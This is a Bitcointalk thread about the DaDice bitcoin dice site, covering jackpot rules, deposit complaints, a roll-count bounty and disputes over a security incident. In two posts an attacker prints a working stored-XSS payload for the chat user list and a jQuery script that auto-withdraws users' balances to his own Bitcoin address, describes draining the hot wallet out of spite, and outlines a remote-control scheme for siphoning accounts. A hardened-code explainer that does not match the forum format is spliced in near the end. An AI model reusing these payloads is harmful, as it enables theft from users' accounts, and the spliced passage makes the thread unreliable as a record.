Bitcoin Forum
Author Topic: DaDice.com - Next Gen Social Gambling Dice Experience | Progressive Jackpot  (Read 257863 times)
Da_Dice_Staff (Full Member | Activity: 154 | Merit: 100)
June 07, 2015, 08:06:35 PM | #2061

Why do you need people to deposit for a jackpot if they can still win with 1 satoshi bets? Wouldn't it be better to allow all bets?

Indeed, but the amount is lower for a 1 sat bet that they can win. Check the FAQ on it, mate.
98problems (Sr. Member | Activity: 364 | Merit: 250)
June 07, 2015, 08:41:45 PM | #2062

I'm really happy that you added the jackpot possibility, will deposit coins and go autobet trying to hit it.

dooglus (Legendary | Activity: 2940 | Merit: 1330)
June 07, 2015, 11:53:08 PM | #2063

Is a new deposit required to be eligible to get the prize from this current jackpot amount? I made my last deposit on 5th June, so is it OK or do I have to make a new deposit after this announcement?

As long as your most recent entry in your ledger is a deposit, mate.

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, do all 10 deposits count towards the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

Bitraker (Full Member | Activity: 145 | Merit: 100)
June 08, 2015, 03:52:46 AM | #2064

How come this site won't refund my bitcoin? I sent BTC to the site 2 days ago and never received my deposit. Is this a shady scam? I sent 3 emails asking for a refund but they have not sent it!
How many times do I need to email support to get my refund?
romano1 (Sr. Member | Activity: 336 | Merit: 250)
June 08, 2015, 05:16:21 AM | #2065

How come this site won't refund my bitcoin? I sent BTC to the site 2 days ago and never received my deposit. Is this a shady scam? I sent 3 emails asking for a refund but they have not sent it!
How many times do I need to email support to get my refund?

Hey brother, they are not a scam, trust me. Please tell me: did the transaction get confirmed? Did you deposit to the correct address? If the answer is yes for both, then please send them a message here, profile link - https://bitcointalk.org/index.php?action=profile;u=444316
Watoshi-Dimobuto (Hero Member | Activity: 840 | Merit: 524)
June 08, 2015, 06:19:51 AM | #2066

Is a new deposit required to be eligible to get the prize from this current jackpot amount? I made my last deposit on 5th June, so is it OK or do I have to make a new deposit after this announcement?

As long as your most recent entry in your ledger is a deposit, mate.

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, do all 10 deposits count towards the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

I would say that they prefer real players to win the jackpot over full faucet players.

I don't think there are any restrictions like that. The last 'entry in the ledger' should not be a faucet claim. I think that is it. And faucet claims < deposits. Reasonable, in my opinion. You wouldn't want all jackpot wins to be by faucet players.
Watoshi-Dimobuto (Hero Member | Activity: 840 | Merit: 524)
June 08, 2015, 06:22:26 AM | #2067

How come this site won't refund my bitcoin? I sent BTC to the site 2 days ago and never received my deposit. Is this a shady scam? I sent 3 emails asking for a refund but they have not sent it!
How many times do I need to email support to get my refund?

Post your txid. Do you still have access to your account? Your username and deposit address would be needed too.
Da_Dice_Staff (Full Member | Activity: 154 | Merit: 100)
June 08, 2015, 07:01:23 AM | #2068

Is a new deposit required to be eligible to get the prize from this current jackpot amount? I made my last deposit on 5th June, so is it OK or do I have to make a new deposit after this announcement?

As long as your most recent entry in your ledger is a deposit, mate.

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, do all 10 deposits count towards the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

I would say that they prefer real players to win the jackpot over full faucet players.

I don't think there are any restrictions like that. The last 'entry in the ledger' should not be a faucet claim. I think that is it. And faucet claims < deposits. Reasonable, in my opinion. You wouldn't want all jackpot wins to be by faucet players.

Yup, that is pretty much spot on, mate.
panjul07 (Legendary | Activity: 3514 | Merit: 1357)
June 08, 2015, 07:03:17 AM | #2069

Yeah, JACKPOT! Glad to see this new feature on DD.
But unfortunately I can't make a deposit right now. Aside from blockchain still being in maintenance, I also get an error message when I click the bitcoin deposit button: "Internal Processing Error." What is that?

Hmmmm, not sure there myself, mate. Send a message along to support so our dev can have a look for you.

It's fixed now, just deposited a small amount and I'll try to be the first player to hit the jackpot number.
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me, lol.
But when someone rolls the jackpot number, where do they claim it? On the chatbox or here?
Edit: or will the jackpot be credited automatically?

Thanks

dadice (OP) (Sr. Member | Activity: 252 | Merit: 250)
June 08, 2015, 07:15:11 AM | #2070

Yeah, JACKPOT! Glad to see this new feature on DD.
But unfortunately I can't make a deposit right now. Aside from blockchain still being in maintenance, I also get an error message when I click the bitcoin deposit button: "Internal Processing Error." What is that?

Hmmmm, not sure there myself, mate. Send a message along to support so our dev can have a look for you.

It's fixed now, just deposited a small amount and I'll try to be the first player to hit the jackpot number.
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me, lol.
But when someone rolls the jackpot number, where do they claim it? On the chatbox or here?
Edit: or will the jackpot be credited automatically?

Thanks

Yes, the jackpot will be credited automatically.

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
Da_Dice_Staff (Full Member | Activity: 154 | Merit: 100)
June 08, 2015, 07:17:14 AM | #2071

Yeah, JACKPOT! Glad to see this new feature on DD.
But unfortunately I can't make a deposit right now. Aside from blockchain still being in maintenance, I also get an error message when I click the bitcoin deposit button: "Internal Processing Error." What is that?

Hmmmm, not sure there myself, mate. Send a message along to support so our dev can have a look for you.

It's fixed now, just deposited a small amount and I'll try to be the first player to hit the jackpot number.
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me, lol.
But when someone rolls the jackpot number, where do they claim it? On the chatbox or here?
Edit: or will the jackpot be credited automatically?

Thanks

Hey mate. The jackpot is credited automatically when won. There's an announcement in chat as well. Good luck!
Da_Dice_Staff (Full Member | Activity: 154 | Merit: 100)
June 08, 2015, 08:19:14 AM | #2072
Last edit: June 08, 2015, 06:05:22 PM by Da_Dice_Staff

BRAND NEW BOUNTY FOR 300 000 000 ROLLS!

We are giving everyone yet another chance to win with our #300,000,000 bounty!

All you need to do is predict on what day you think the 300,000,000th roll will happen.

Whoever posts the correct date first will win the 0.1 BTC prize!

-   The prize will be sent to any BTC address you give us; please supply your address in your post.
-   The prize will go to whoever posted the correct date first.
-   Only your first date will be considered valid. If you change your mind and guess another day, you will be doing it only for fun.
-   The winner will be announced on Bitcointalk.

As with the 200 millionth bounty, there is another twist with this one. The bounty for hitting this roll on DaDice will be 0.5 BTC IF this roll happens on the 30th of June 2015. For every day the roll happens before then, a further 0.05 BTC will be added to the total. (So if it happens to be the 28th of June, then the rolling bounty will be 0.6 BTC, and so forth.) If the roll happens after our predicted date, then the bounty remains at 0.5 BTC. You can increase this bounty by leaps and bounds, as with the last one, which went at an awesome 1.15 BTC!

The second twist is that the prediction competition is ONLY open for 1 week from the time of this initial post! You can guess any date, not just on or before our date; dates after it may be guessed as well. Good luck! And remember, to enter the predictions, please do so on the following thread: https://bitcointalk.org/index.php?topic=996260.new#new

Good Luck, and Keep Rollin'!

Remember to also enter the competition on our FB page and Twitter (@DaDice1), where we will also be giving away 0.1 BTC to whoever predicts the correct date on that platform.
SebastianJu (Legendary | Activity: 2674 | Merit: 1082)
June 08, 2015, 10:31:15 AM | #2073

You're really not getting it. If I'd pay you more than dadice, could I be your pimp? What's your price?

Ah, you switched to this thread. And it seems you took your 5+ sockpuppet accounts with you.

You know, you're interesting to me. Asking me if I would stop promoting them if you would draw out more dirt about dadice. Sounds like you have an interest in this. And seeing that you take the time to come in here with a sockpuppet army and spend much time fighting dadice... it makes it look like it. And we know there is someone who has an interest in it. I mean, first a framing against ndnhc, now a hack. I mean, there IS someone behind it. And the easiest answer is... it's a competitor.

So everyone who is getting paid for advertising is a whore to you? Um... ok.

Yes, I chose dadice because they pay well and they are trustworthy so far. Besides that, they have been nice people until now.

So far it's only a service for me. I post anyway. If I can get some coins for it on the way... so be it. But until now it's still the best campaign.

If dadice had been created to be a scam, then they are doing it really wrong. They would have had to run when they had the most money. Now they have to bother with all the trouble, and this will affect the site. Fewer new users. They still don't run.

And if they had used up their investment money, then surely one or more investors would like to withdraw. A scammer would not allow that. Still... there is no one claiming to have problems with withdrawing funds.

Still... one thing I would do differently is that I would present a cold wallet. If the initial investor wasn't smart enough to hide their traces, then the cold wallet should be recreated. It's simple. Upload the coins to an exchange (if you're feeling insecure, then do it in parts) and load them into a fresh cold wallet address. Present a verified message. And most of the critics, plus most of the red trust, will vanish, allowing you to get more users on the site.

Please ALWAYS contact me through bitcointalk pm before sending someone coins.
SebastianJu (Legendary | Activity: 2674 | Merit: 1082)
June 08, 2015, 10:46:22 AM | #2074

Marco, it looks like the conversation shows that you handle it the same way as dadice. Your escrow address is funded as far as the current payouts are valued. It would be enough to pay all users.

Though it would be a risk to your campaign if you really would be the escrow too.

Let me know if I misunderstood.

SebastianJu (Legendary | Activity: 2674 | Merit: 1082)
June 08, 2015, 10:50:11 AM | #2075

The unofficial report of how this attack was able to happen

Sorry, dadice_dev didn't explain how it happened. So I thought I would add an explanation so the public can make up their own minds about whether it was or wasn't serious. My opinion is this is serious. But what do I know? This will be my last post on dadice.

After the first attack, explained here:
https://bitcointalk.org/index.php?topic=973765.msg11351048#msg11351048

A fix was sorted to prevent users being impersonated. However, the injection method stayed the same. In fact, back then it was possible to do the same thing. However, the test here was to see if DaDice would lie about the severity, and I didn't want to impact them too much. Think of it as a free bug report.

So back to what enabled all this drama.

The object:
Code:
var socket_handshake_gameplay_token

is the offending player. It tells the chat server who you are.

Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "One",
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};

It is sent to the chat server to update the chat server.
Code:
socket.emit("online", socket_handshake_gameplay_token);

That's fine, so how can we use this to update all clients with some JS code?

That required a lot of trial and error. Finding ways to do things is not always as simple as reading the code. One must first understand how these will render on the client browser. There was lots of time to be caught in the act. Maybe DaDice wanted to watch or just legitimately didn't think it was all that serious.

The userlist on the chat window is now where we need to look. The chat box does not allow scripts to run, but the userlist still updated with the new name change. Like this:
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "Two", //change name and user list updates
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

So now what? We can make the server send our new username to all clients and all new clients.

Let's try running some JS, and keep the original HTML so it doesn't cause errors.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>//put script here</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

Now we can run any script we want. We could have called our own server and sent cookies and session data, or maybe implemented subtle things like redirecting the deposit code to our BTC address. Since no one deposits on DaDice, that would be a tremendous waste of time.

A script to auto-withdraw the dust was more fun. But the hot wallet rarely has more than 0.1 BTC in it. This was not to take coin, but to show the dev he is arrogant. Had he not dismissed my first post, I probably would have just reported it (I'm not interested in bug bounty money; I already have more than enough money). But he was a prick, and I felt it would be better to just do another attack using JS. Maybe they can learn to be nice in the future. I was not paid, nor did I do it to benefit any other dice site. This was done purely out of my personal spite towards the people running DaDice because they were assholes to me.

My code here is pretty messy, setting up some events would have been better, but I was pretty lazy and the wallet only had 0.008btc left in it.
Code:
// Finds the button labelled buttonName, clicks it and fills the withdrawal form
function clickButton(buttonName) {
  $(".btn").each(function (i, obj) {
    if ($(this).text() == buttonName) {
      $(this).click();
      $("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");
      $("#withdraw_amount").val("0.001");
    }
  });
}

// Every 5 seconds: show the message, then trigger the withdraw button
setInterval(function () {
  alert("DaDice has been Hacked.. bullshit message");
  clickButton("Withdraw");
}, 5000);

The entire JS injection that was pasted into the console was this. This is not exactly as it was, because I was coding in the console and didn't save it. But you get the idea.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>function clickButton(buttonName){$(".btn").each(function(i, obj) {if ($(this).text()==buttonName){$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");$("#withdraw_amount").val(+($("h2").text()-0.0001));$(this).click();}});};setInterval(if (+$("h2").text()>0.0011){function(){$("#account_withdraw").click();setTimeout(function(){clickButton("Withdraw");},5000);},10000);}</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};
socket.emit("online", socket_handshake_gameplay_token);
socket.emit("online_list_request", socket_handshake_gameplay_token);

I will also be sending back the 0.008 BTC drained from the hot wallet to an account on DaDice, and I will even send a few extra dust particles as interest for the loan. This will also end the DaDice attacks. Someone else will probably find something new. Who knows. So be careful, because DaDice have a history of taking a long time to fix known issues. If I wasn't so open, this would still be going on.

The point is, DaDice knew about this for weeks and nothing was done about it. They lied about the severity, or didn't realize the severity. If I ran a dice site and had the same issue, I probably would try to step around the severity too; can't blame them on that front. It was a simple chat attack. But this "simple" attack was a serious breach, as we were able to run as much code as we wanted to. Anything could have been done on the client machines.
It also would have been prevented if they had just allowed the Skype call that I requested, which was ignored.

I wish the dev had posted something more concrete like this, but instead he just tried to reduce it to a simple chat attack that did not impact their security. Yes, it was indeed simple, but it was a major security breach.

Enjoy the day.

This is an interesting explanation. I'm not a pro, but could you have run ANY code? Or are there restrictions? What did you actually withdraw, if not the hot wallet?

If you had been able to empty the hot wallet, then this would be a serious problem. Though to be fair, things like that have happened to many exchanges and websites too. The only difference then is whether you have a real cold wallet or built something stupid like automatically recharging hot wallets or so.

Da_Dice_Staff (Full Member | Activity: 154 | Merit: 100)
June 08, 2015, 06:02:48 PM | #2076

Hmmmmm, the jackpot is at 1.02467985 already, so looking good for whoever wins it.
panjul07 (Legendary | Activity: 3514 | Merit: 1357)
June 08, 2015, 07:15:34 PM | #2077

Is it down? Any news?
While I was playing with autobet, it stopped suddenly, and when I refreshed I got a 525 error.
Anyone else getting the same error?

Edit: it's up when I use the live version.

bodgybrothers (Member | Activity: 106 | Merit: 10)
June 09, 2015, 04:53:53 AM | #2078
Last edit: June 09, 2015, 05:25:54 AM by bodgybrothers

This is an interesting explanation. I'm not a pro, but could you have run ANY code? Or are there restrictions? What did you actually withdraw, if not the hot wallet?

If you had been able to empty the hot wallet, then this would be a serious problem. Though to be fair, things like that have happened to many exchanges and websites too. The only difference then is whether you have a real cold wallet or built something stupid like automatically recharging hot wallets or so.

I know I said that last post was my last, but I need to respond to the question.

Any code could be run. If done in secret, you could withdraw from user accounts each day. Many things can be done when you can execute any code on a user's machine. If I was really serious about taking money slowly, I would have set up a communication channel between my computer and the client browser. The client malware would send me details of the client's account and how much is available. My communication server would then tell the malware what to do: how to render the page and whether to withdraw. I'd have complete control over that user's interface to DaDice. I could place bets on behalf of the user, making for a big PR issue for DaDice, or withdraw by sending a click command on the withdraw button. There are so many possibilities, because you can do anything the user can do. The issue with DaDice is, no user has any money and the hot wallet is so small. So it's a waste of time to set up an elaborate draining system. There simply is no money there. When I did this the hot wallet had only 0.008 BTC, which is all I got. But the purpose was to prove the dev a liar. The hack was genuinely significant; I could run JS on clients' machines from day one and gave them time to rectify it before the next attack. It matters not that the chat server is separate from the game server if both are connected via a client browser.

His arrogant post, shown below, is why I didn't report it directly. This line:
The variable that "buffoon" played with was on client-end (i.e. his browser end).
is not correct. If it was only my browser, then how did all other browsers and newly logged-in users see my changes?
And then this:
Yes, this issue has been fixed although it remained 2nd in our priority, the first priority was as other users have discussed before latency issue which was causing whole Da Dice to slow down.
A serious open door is 2nd priority over excessive browser document updates?

And then this lie:
suppose we still had NOT fixed this issue even then all that these buffoons and crookeds could do was to broadcast chat messages as other users, nothing else! period!
And then the image of the boy who got into Facebook because they didn't log out = hacker. That was insulting, because that's not what happened here. It also shows a lot of arrogance, which is scary when dealing with money. You must always be thinking someone is doing something you never intended when you have sites that handle money.

Naturally, after seeing that response, I waited for the water to calm and hit it with a wallet drain attack to prove that if they didn't fix it, something else would have happened. Sometimes people need to be careful how they approach egos. Mine doesn't take nicely to accusations of being an idiot.

Note: all the answers below turned out to be lies.

Q. So Dadice was hacked yesterday?
A. No it wasn't, but we can be on board on a point that there was a peculiar and "witty" type of incident.

Q. How come someone was able to change the name in chat/post as other users? Doesn't that mean the entire site was compromised?
A. Please allow me to explain how the Da Dice system currently works. The main system, where users' passwords, bitcoins, profiles and stats are stored, is completely secure and runs parallel with other Da Dice systems (i.e. chat, social features), which means that both run 100% apart from each other. Which is in fact better and more secure!

There is a separate database that acts as a bridge between these 2 systems, so when a user is authenticated on the main dadice system, a special token is generated for him/her to be able to use the social features of the site. After this, when a user utilises one of these social features, i.e. sockets for chat, right there our NodeJS/Socket.io cross-checks the token.

it was a direct change to server side variables that store usernames.
This is a false statement. The variable that "buffoon" played with was on the client end (i.e. his browser end).

Q. Da Fix?
Yes, this issue has been fixed, although it remained 2nd in our priority; the first priority was, as other users have discussed before, the latency issue which was causing the whole of Da Dice to slow down.

However, it is not enough to just apply a single patch and consider it fixed. We believe the issue must be thoroughly investigated, and the root causes and the exploiters identified. We were able to identify our "buffoons" as @mnbnm, @bluewaffle and @haxer. Their IP addresses were also blacklisted (I know, I know, there is no shortage of IPs, VPNs or even Da Dice accounts, but it's the standard protocol to be followed and therefore we suspended their accounts).

We will also be monitoring any further exploiters who attempt to do this. A quick reenactment:

(I was online last night with our buffoon who desperately kept trying after the fix was implemented.)

Why is this significant? The moderators will tell you it was just a hack to the chat system and was not in any way an issue to the security of the site. To me it is more than that. It is the site's controls over web sessions that are now in question. Why is it possible to change any details of a web session on the server? The server, and only the server, should be monitoring this and ensuring the username used to log in and the session cannot be changed. In this case, it demonstrates that this site could have some more serious vulnerabilities.
There is no doubt that these issues must be addressed seriously, and they were. As I have explained before, the two systems run parallel to each other, so just for the sake of security even the session variables are not shared, while both of the systems are fully secure on the server end.

The issue was simple:
- Mr. buffoon edits the variable in his browser which carries his username.
- On the server side, nodejs authenticated him "as a user of Da Dice" with his token by cross-checking it with his user ID.
- Trusting that a user had been authenticated in both places, Mr. buffoon's messages were then relayed to further users.

So just to clarify in between all this, "sessions" were NOWHERE involved and the server was NOWHERE compromised.

Change the username in the variable above and then log back in:
You now have someone else's username. No server side checks or anything!

...
The site made it easy with the client telling the server who it was, and the server didn't have any checks of who it actually was.

As explained before, the token was cross-checked with the ID of the user, which is carried alongside the token, but not the username. And this was the behaviour which has been corrected. So to summarise it: there was NO serious threat; however, an additional query to cross-check "usernames" alongside "user ID" has been added for our "Crooked" fellows.

Having said that, suppose we still had NOT fixed this issue; even then, all that these buffoons and crookeds could do was to broadcast chat messages as other users, nothing else! Period!

No longer does the statement "It's just a simple chat hack" make a difference. They have yet to fix it! If it was so simple, why did it take so long?
DenseCrab also complained he lost access to his account and logged in as CenseDrab due to this access issue. And he was also the first to be targeted in chat.

Naturally, the poor chap initially thought his account was compromised, and in a hurry he changed the password, which later he couldn't produce himself; he contacted support and his issue was resolved.

The statement remains the same: "It's just a simple chat hack". In fact, "It was just a simple chat hack", and #2 on our priority list that day. The major issue was the speed and latency which our users were experiencing due to CloudFlare, and we were working with them to optimise networking.

Ending Note:

Obviously the agenda is to spread panic and slander Da Dice. If you realise you should "steer clear" of this one, you're welcome to do so, and the same from our official threads etc. The main thing is that when we told our users in chat that there was nothing to worry about, our loyal users understood the fact that there was indeed nothing serious to be concerned about, although a whole new level of trolling was unleashed in our chat box. In fact, no one has given a real thought to posting here at Bitcointalk as well... Da Dice is aiming for the #1 position, and I personally believe that the arena is big enough for all fishes to swim, so there is no real need to get super competitive, and the fact must be accepted with an open heart.

Is dadice hack proof? Fool proof?
No! But no other site is either. We have seen the current #1 dice site facing challenges itself from time to time; every day technology is evolving and new means of manipulation are being developed. We have had our fair share of serious threats right upon our start and we are constantly working on these challenges... but then there are these kinds of people too:

BTW, Dev guy. The agenda was to prove you wrong. So stop saying it's all the other dice sites paying for this to happen or there is some great dicing collusion conspiracy. It's only between you and me.
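The report quoted in #2075 and the dev's Q&A above describe the same root cause: the chat server accepted the "user" object the client sent alongside its token, and the user list rendered that username as raw HTML. The following is an added example, not DaDice's code nor either poster's, that puts the trusting variant beside a hardened one which resolves the username from the server-side token record and escapes it before it reaches the user list. The token store, function names and markup are assumptions.

```javascript
// Added example (not DaDice's code): server-side handling of the chat "online"
// handshake. The token format mirrors the report; the store is constructed.
const TOKEN_STORE = new Map([
  ["1|11111111111111111111|1.1.1.1", { id: "1", username: "One" }],
  ["2|22222222222222222222|2.2.2.2", { id: "2", username: "Two" }],
  ["3|33333333333333333333|3.3.3.3", { id: "3", username: "Ann <3" }],
]);

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape a value before it is concatenated into user-list HTML.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable shape (what the Q&A describes): the token is checked against the
// user ID, but the username broadcast to every client is whatever the client
// sent, inserted unescaped into the user-list markup.
function vulnerableHandleOnline(handshake) {
  const record = TOKEN_STORE.get(handshake.token);
  if (!record || record.id !== handshake.user.id) return { reject: "bad token", broadcast: null };
  return {
    reject: null,
    broadcast: `<a class="user" data-id="${handshake.user.id}">${handshake.user.username}</a>`,
  };
}

// Hardened shape: only the token is taken from the client; id and username
// come from the server record. A client "user" object that disagrees is
// flagged so the attempt can be logged.
function resolveIdentity(handshake) {
  const record = TOKEN_STORE.get(handshake && handshake.token);
  if (!record) return { ok: false, reason: "bad token" };
  const claimed = (handshake && handshake.user) || {};
  const mismatch =
    (claimed.id !== undefined && claimed.id !== record.id) ||
    (claimed.username !== undefined && claimed.username !== record.username);
  return { ok: true, user: { ...record }, mismatch };
}

function handleOnline(handshake) {
  const r = resolveIdentity(handshake);
  if (!r.ok) return { reject: r.reason, broadcast: null, mismatch: false };
  const broadcast = `<a class="user" data-id="${escapeHtml(r.user.id)}">${escapeHtml(r.user.username)}</a>`;
  return { reject: null, broadcast, mismatch: r.mismatch };
}

// Constructed handshakes modelled on the objects in the report.
const HONEST = { token: "1|11111111111111111111|1.1.1.1", user: { id: "1", username: "One" } };
const RENAMED = { token: "1|11111111111111111111|1.1.1.1", user: { id: "1", username: "Two" } };
const INJECTED = {
  token: "1|11111111111111111111|1.1.1.1",
  user: { id: "1", username: 'One" class="" href="javascript:;"><script>alert(1)</script>' },
};
const ODD_NAME = { token: "3|33333333333333333333|3.3.3.3", user: { id: "3", username: "Ann <3" } };
const BOGUS = { token: "9|99999999999999999999|9.9.9.9", user: { id: "1", username: "One" } };

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, h] of Object.entries({ HONEST, RENAMED, INJECTED, ODD_NAME, BOGUS })) {
    console.log(label, "vulnerable:", JSON.stringify(vulnerableHandleOnline(h)));
    console.log(label, "hardened:  ", JSON.stringify(handleOnline(h)));
  }
}
```

The `mismatch` flag is the detection hook: a handshake whose claimed username differs from the server record is exactly the impersonation attempt the thread describes, and is worth alerting on even though the hardened handler ignores the claimed value.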

Vezalke (Member | Activity: 76 | Merit: 10)
June 09, 2015, 06:28:09 AM | #2079

About investing... did you take 10% of principal + profit when divesting, or 10% from profit?
waterpile (Hero Member | Activity: 602 | Merit: 500)
June 09, 2015, 06:37:03 AM | #2080

About investing... did you take 10% of principal + profit when divesting, or 10% from profit?

I think it's pretty much 10% from profit; if it were principal + profit, no one would be interested in investing.